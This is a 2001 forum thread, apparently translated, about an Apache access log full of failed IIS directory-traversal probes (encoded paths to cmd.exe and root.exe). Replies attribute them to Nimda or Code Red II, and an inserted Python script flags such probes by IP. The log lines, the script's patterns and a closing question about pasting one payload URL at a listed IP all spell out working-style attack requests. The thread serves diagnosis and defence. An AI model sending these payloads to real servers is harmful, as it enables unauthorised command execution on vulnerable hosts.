Is there a new version of Code Red going around? Please take a look at my log

ba88ms21
2001-09-19, 02:59 PM
61.216.24.46 - - [19/Sep/2001:14:54:33 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
61.216.24.46 - - [19/Sep/2001:14:54:36 +0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
61.216.140.33 - - [19/Sep/2001:14:54:37 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
61.216.140.33 - - [19/Sep/2001:14:55:00 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
61.216.140.33 - - [19/Sep/2001:14:55:06 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
61.216.140.33 - - [19/Sep/2001:14:55:11 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
61.216.140.33 - - [19/Sep/2001:14:55:23 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
61.216.24.46 - - [19/Sep/2001:14:55:24 +0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
61.216.24.46 - - [19/Sep/2001:14:55:49 +0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
61.216.14.22 - - [19/Sep/2001:14:55:53 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
61.216.14.22 - - [19/Sep/2001:14:55:55 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
61.216.36.174 - - [19/Sep/2001:14:57:41 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
61.216.36.174 - - [19/Sep/2001:14:57:45 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
61.216.36.174 - - [19/Sep/2001:14:57:47 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
61.216.36.174 - - [19/Sep/2001:14:57:48 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
61.216.36.174 - - [19/Sep/2001:14:57:50 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
61.216.36.174 - - [19/Sep/2001:14:57:52 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
61.216.36.174 - - [19/Sep/2001:14:58:18 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
61.216.36.174 - - [19/Sep/2001:14:58:22 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336
61.216.36.174 - - [19/Sep/2001:14:58:25 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
61.216.36.174 - - [19/Sep/2001:14:58:28 +0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
61.216.36.174 - - [19/Sep/2001:14:58:32 +0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
61.216.36.174 - - [19/Sep/2001:14:58:38 +0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
61.216.186.37 - - [19/Sep/2001:14:58:43 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
61.216.186.37 - - [19/Sep/2001:14:58:45 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
61.216.186.37 - - [19/Sep/2001:14:58:51 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
61.216.36.174 - - [19/Sep/2001:14:58:51 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
61.216.186.37 - - [19/Sep/2001:14:58:53 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
61.216.36.174 - - [19/Sep/2001:14:58:58 +0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
61.216.186.37 - - [19/Sep/2001:14:58:58 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
61.216.36.174 - - [19/Sep/2001:14:59:01 +0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
61.216.186.37 - - [19/Sep/2001:14:59:04 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
61.216.36.174 - - [19/Sep/2001:14:59:08 +0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
61.216.186.37 - - [19/Sep/2001:14:59:09 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
61.216.186.37 - - [19/Sep/2001:14:59:11 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336
61.216.92.80 - - [19/Sep/2001:14:59:13 +0800] "GET /cy/newimage.js HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:14 +0800] "GET /cy/themes/Green/style.css HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:14 +0800] "GET /cy/images/await.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:14 +0800] "GET /cy/themes/Green/logo.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:14 +0800] "GET /cy/images/pix.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/topics/sun.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/index.php HTTP/1.1" 200 30261
61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/print.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/friend.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/topics/news.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/topics/compaq.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/menu/traditionalchinese/vote.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/menu/traditionalchinese/result.gif HTTP/1.1" 304 -
61.216.186.37 - - [19/Sep/2001:14:59:16 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302

Ares
2001-09-19, 04:18 PM
If I'm not mistaken....
You're running NT 4.0 or Win2000, right?
Are you using IIS as your web server?
If you're not, please remove it~~~~~~~~~~~~~~
Someone has gotten into your C: drive.....
A quick search on the net turns up piles of PCs running IIS with no protection at all.....
Even someone whose hacking skills don't even reach beginner level (like me) can break in.
I really don't get why so many home users install 2000 Server without even hosting a website; isn't installing Professional, like I did, good enough~~~

ba88ms21
2001-09-19, 04:29 PM
No, I'm using Apache for Win32. Can someone tell me what's going on here?

maxtk
2001-09-19, 04:57 PM
Originally posted by Ares
If I'm not mistaken....
You're running NT 4.0 or Win2000, right?
Are you using IIS as your web server?
If you're not, please remove it~~~~~~~~~~~~~~
Someone has gotten into your C: drive.....
A quick search on the net turns up piles of PCs running IIS with no protection at all.....
Even someone whose hacking skills don't even reach beginner level (like me) can break in.
I really don't get why so many home users install 2000 Server without even hosting a website; isn't installing Professional, like I did, good enough~~~

Did they really get into the C: drive? Look more carefully.. it's a pile of 404s....-.-

signally
2001-09-19, 05:15 PM
This isn't Code Red.
Code Red breaks in using a buffer overflow.
In your case, someone is trying to break in through the Unicode CGI decoding bug.

deepblue
2001-09-19, 05:24 PM
Maybe this is Code Blue or Nimda.
These two new viruses could be called the next generation of Code Red.
Just like cockroaches, they keep getting stronger.

Ares
2001-09-19, 05:41 PM
Sorry, got it. If your server is Apache for Win32, these log entries look like attempts to exploit the IIS /scripts vulnerability that didn't succeed; even though they didn't get in, they still eat up some bandwidth.
This is probably the Nimda virus, since it spread everywhere today, with about the same impact as Code Red.
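
As an added example (not code from anyone in this thread), here is a small Python script that does what maxtk and Ares did by eye: it parses Apache access-log lines, undoes the double percent-encoding and overlong UTF-8 tricks these requests rely on, flags the cmd.exe/root.exe traversal probes, and reports per source IP whether the server ever answered one with a 2xx (on Apache, as here, they all end in 400 or 404). The log regex assumes Apache's common/combined format, the OVERLONG table is my own assumed mapping of the byte pairs seen in this log to the separators unpatched IIS decoded them to, and the sample lines are copied from the log above plus one constructed benign request.

```python
import re
from urllib.parse import unquote_to_bytes
# Apache access-log prefix: ip ident user [time] "method path proto" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
# Overlong UTF-8 pairs seen in this log, assumed to decode to separators as unpatched IIS did.
OVERLONG = {b"\xc0\xaf": b"/", b"\xc0\x2f": b"/", b"\xc1\x9c": b"\\", b"\xc1\x1c": b"\\"}

def normalize_path(raw):
    """Percent-decode until stable (the IIS double-decode bug), then map overlong
    UTF-8 to separators, fold backslash to slash and lower-case the result."""
    data = raw.encode("latin-1", "replace")
    for _ in range(3):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    for seq, sep in OVERLONG.items():
        data = data.replace(seq, sep)
    return data.replace(b"\\", b"/").decode("latin-1").lower()

def is_probe(path):
    """Nimda / Code Red II style request: traversal or a cmd.exe / root.exe call."""
    norm = normalize_path(path)
    return "/../" in norm or "cmd.exe" in norm or "root.exe" in norm

def scan(lines):
    """Return {ip: {"probes": n, "succeeded": n}}; a 2xx on a probe means the
    server actually answered it (this thread's log shows only 400 and 404)."""
    report = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _ts, _method, path, status, _size = m.groups()
        if is_probe(path):
            entry = report.setdefault(ip, {"probes": 0, "succeeded": 0})
            entry["probes"] += 1
            entry["succeeded"] += 1 if status.startswith("2") else 0
    return report

# Sample input: three lines copied from the log above plus one constructed benign hit.
SAMPLE = [
    '61.216.24.46 - - [19/Sep/2001:14:54:33 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286',
    '61.216.36.174 - - [19/Sep/2001:14:58:25 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302',
    '61.216.36.174 - - [19/Sep/2001:14:57:45 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279',
    '61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/index.php HTTP/1.1" 200 30261',
]
if __name__ == "__main__":
    for ip, counts in scan(SAMPLE).items():
        print(ip, counts)
```

Any source that shows a non-zero "succeeded" count is the one to look at first; on Apache that count stays at zero for every IP in this log.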

bgbg
2001-09-19, 10:28 PM
Originally posted by Ares
Sorry, got it. If your server is Apache for Win32, these log entries look like attempts to exploit the IIS /scripts vulnerability that didn't succeed; even though they didn't get in, they still eat up some bandwidth.
This is probably the Nimda virus, since it spread everywhere today, with about the same impact as Code Red.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A question for the experts:
The attempts above didn't succeed, but on a host whose vulnerability hasn't been patched, would typing http://61.216.36.174/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir into a browser directly show all of that host's directories? :confused: Could one of you experts explain? Thanks.